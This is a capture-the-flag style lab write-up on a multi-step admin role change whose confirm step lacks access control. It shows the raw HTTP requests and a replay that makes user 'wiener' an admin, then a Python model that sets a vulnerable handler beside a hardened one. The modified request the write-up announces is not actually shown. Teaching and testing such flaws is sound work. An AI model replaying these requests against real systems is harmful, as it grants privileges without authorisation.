Multi-step process with no access control on one step
This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
After gaining access with administrator credentials (administrator:admin), I explored the admin panel functionalities and identified the "upgrade" feature for elevating user roles. Attempting to upgrade the "carlos" user, I encountered a two-step process. First, I needed to submit the user for upgrade, and then confirm the upgrade with a second request:
Request to submit the upgrade:
POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=7FxCRLXLP4Jf7twGl22ZDyda1np5q9y3
Content-Length: 30
...

username=carlos&action=upgrade
Request to confirm the upgrade:
POST /admin-roles HTTP/2
Host: ****.web-security-academy.net
Cookie: session=7FxCRLXLP4Jf7twGl22ZDyda1np5q9y3
Content-Length: 45
...

action=upgrade&confirmed=true&username=carlos
Upon logging out and logging in as "wiener," I bypassed the first step's control and directly sent the second request, altering the session cookie. The modified request was:
By executing this maneuver, "wiener" was successfully upgraded to an admin, resolving the lab.
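The flaw described above, modelled next to a hardened handler, as an added example that is not part of the original write-up or the lab's own code. The handler names, session tokens, role table and status codes are constructed assumptions; only the form fields come from the requests shown above.

```python
# Constructed model of a two-step role change on POST /admin-roles.
# Handler names, session tokens and status codes are illustrative assumptions.
from urllib.parse import parse_qs

SESSIONS = {"admin-session": "administrator", "user-session": "wiener"}  # constructed


def new_roles():
    return {"administrator": "admin", "wiener": "user", "carlos": "user"}


def handle_vulnerable(session, body, roles):
    """The submit step checks the caller's role; the confirm step does not."""
    caller = SESSIONS.get(session)
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if caller is None:
        return 401
    if form.get("confirmed") == "true":
        # Flaw: assumes only an admin could ever have reached this step.
        roles[form["username"]] = "admin"
        return 200
    if roles.get(caller) != "admin":
        return 403
    return 200  # would render the confirmation page


def handle_hardened(session, body, roles):
    """Authorisation runs once, before any step-specific logic."""
    caller = SESSIONS.get(session)
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if caller is None:
        return 401
    if roles.get(caller) != "admin":
        return 403  # covers the submit step and the confirm step alike
    target = form.get("username")
    if form.get("action") != "upgrade" or target not in roles:
        return 400
    if form.get("confirmed") == "true":
        roles[target] = "admin"
    return 200


def replay_confirm(handler):
    """Send only the confirm request on a non-admin session; return (status, role)."""
    roles = new_roles()
    body = "action=upgrade&confirmed=true&username=wiener"
    return handler("user-session", body, roles), roles["wiener"]
```

The hardened version derives the decision from the caller's current role on every request, so skipping the first step gains nothing.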